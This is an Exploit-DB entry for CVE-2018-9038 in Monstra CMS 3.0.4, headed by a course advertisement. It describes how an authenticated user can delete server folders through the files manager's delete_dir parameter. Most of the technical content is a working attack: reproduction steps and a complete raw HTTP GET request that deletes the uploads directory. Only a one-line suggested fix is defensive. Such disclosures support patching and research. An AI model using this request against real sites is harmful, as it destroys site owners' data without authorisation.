Monstra CMS 3.0.4 - Arbitrary Folder Deletion

EDB-ID:

44512




Platform:

PHP

Date:

2018-04-24


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

# Exploit Title: Monstra CMS 3.0.4 allows remote attackers to delete folder via an get request
# Date: 2018-03-26
# Exploit Author: Wenming Jiang
# Vendor Homepage: https://github.com/monstra-cms/monstra
# Software Link: https://github.com/monstra-cms/monstra
# Version: 3.0.4
# Tested on: macos 10.12.6, php 5.6, apache2.2.29
# CVE :CVE-2018-9038


Description:
Monstra CMS 3.0.4 allows remote attackers to delete folder via an admin/index.php?id=filesmanager&delete_dir=./&path=uploads/ request.


Steps to Reproduce:
1、Log in as a user with page editing permissions
2、Request http://your_site/admin/index.php?id=filesmanager&delete_dir=./&path=uploads
3、The uploads folder will be deleted.


Poc code:
GET /monstra/admin/index.php?id=filesmanager&delete_dir=./&path=uploads/&token=008708df48237172f6fe2d173dc30529eac132de HTTP/1.1
Host: localhost:8000
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.10 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://localhost:8000/monstra/admin/index.php?id=filesmanager&path=uploads/
Accept-Language: zh,zh-CN;q=0.9,en;q=0.8,zh-TW;q=0.7
Cookie: SQLiteManager_currentLangue=2; PHPSESSID=882dd1e203c979cedba4524f8107eca3; _ga=GA1.1.1742657188.1524382699; _gid=GA1.1.918663288.1524382699
Connection: close



Vulnerability Type:
Insecure Permissions


Expected Behavior:
deleted uploads folder



Possible Solutions:
Strictly filter the delete_dir parameter and replace './' with '_/'